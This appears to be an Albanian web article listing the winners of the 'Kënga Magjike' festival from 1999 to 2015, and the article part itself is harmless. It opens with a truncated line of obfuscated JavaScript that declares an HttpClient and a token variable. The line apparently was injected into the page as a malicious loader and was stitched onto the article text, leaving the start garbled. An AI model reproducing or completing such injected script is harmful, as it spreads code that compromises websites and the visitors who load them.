;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kush ka arritur të triumfojë më së shumti herë në festivalin ‘Kënga Magjike’?!

By

Kënga magjike është një ndër festivalet që ka një jetë gjatësi si rrallë festival në vendin tonë, që nga vitit 1999 teksa sonte fillon nata e parë e edicionit të 18 të festivalit.

Disa nga emrat më të shquar të muzikës kanë shkelur skenën e festivalit, hite të pa numërta duke e bërë që ‘Kënga Magjike’ të jetë një ndër festivalet më të kërkuara si për artistët ashtu edhe për publikun.

Fituesit e spekaklit nisin qysh prej vitit 1999, me këngëtaren Elsa Lila me këngën e pa harrueshme ‘Vetëm një fjalë’.

Viti 2000 fitoren e kishte rezervuar për motrat simpatike Irma dhe Eranda libohova me këngën ‘Një mijë ëndërra’.

‘Për një çast më ndali zemra’ ishte hit i pa diskutueshëm i vitit 2001 nga artistët Pirro Çako dhe Rovena Dilo të cilët u shpërblyen me çmimin kryesor të festivalit Kënga Magjike.

Mira Konçi një emër jo shumë aktiv në këtë kohë, ishtë ajo që triumfoi në vitin 2002 duke marr çmimin kryesor të festivalit me këngën ‘E pathëna fjalë’

Në vitin 2003 çmimi kryesor iu dha artistës Ema Bytyqi me këngën ‘Ku je ti’.

Irma Libohova në vitin 2000 kishte fituar çmimin me të motrën në bashkpunim, kurse në vitin 2004 rrëmbeu çmimin për herë të dyt me këngën ‘Prapë tek ti do të vi’.

Këngëtarja energjike Genta Ismajli në vitin 2005 ngriti kupën si më e mira e festivalit, me këngën ‘Nuk du tjetër’.

Viti 2006 ishte i këngëtarit dhe tekst shkruesit Armend Rexhepagiqi ku me baladën e mrekullueshme ‘Kur dashuria vdes’ fitoi çmimin kryesor .

Ajo cilësohet si uragani i skenës , Aurela Gaçe, këngëtarja e cila din ta jap shpirtin në skenë e ta shijojë më se miri këngën, skenën ,publikun, viti 2007 kishte zgjedhur si fituese pikërisht atë me këngën ‘Hape vetën ti’.

Jonida Maliqi njihet si këngëtare e festivaleve e nuk ka si të mungone në Kënga Magjike, ishte viti 2008 kur këngëtarja u shpërblye me çmimin kryesor me këngën ‘Njëri nga ata’.

Bashkëpunimet kanë pasur sukses që nga themelimi i festivalit dhe kështu ishte dhe për dyshen Eliza Hoxha dhe Rosela Gjylbegu kur në vitin 2009 u shpallën fituse me këngën ‘Rruga e Zemrës’.

Në vitin 2010 çmimi kryesor shkoi për bashkëpunimin në mes Juliana Pasha dhe Luiz Ejlli me këngën e tyre ‘Sa e shite zemrën’.

Balada e paharrueshme ‘Më lërë të fle’ e kënduar me shumë ndeshmëri nga këngëtari Redon Makashi ishte fituese e vitit 2011.

Alban Skenderaj ka qenë fitues i shumë festivaleve e njëjt ndodhi dhe në vitin 2012 ku fitoi çmimin e parë me këngën ‘Refuzoj’.

‘Tatuazh në zemër’ ishte kënga e duhur e këngëtares Besa Kokëdhina për tu shpallur fituse e vitit 2013.

Bashkpunim që rrallë kujt do të mund ti shkonte në mendje ishte ai në mes këngëtares Aurela Gaçe me Young Zerka , ku u shpallën fitues të viti 2014 me këngën ‘Pa kontroll’.

‘Akoma jo’ ishte balada e cila rrënqethi trupin e shumë adhuruesve të muzikës e kënduar nga Aurela Gaçe e cila u shpall fituse e vitit 2015, duke u bërë keshtu këngëtarja e vetme me tre çmime kryesore të’ Këngës Magjike’.

Viti 2016 ka në konkurrim disa këngë të realizuara deri në përpikmëri e se kush do ti bashkangjitet kësaj liste të fituesve do ta kuptojmë ditëve në vazhdim. /Prive.al/

Artikuj të ngjashëm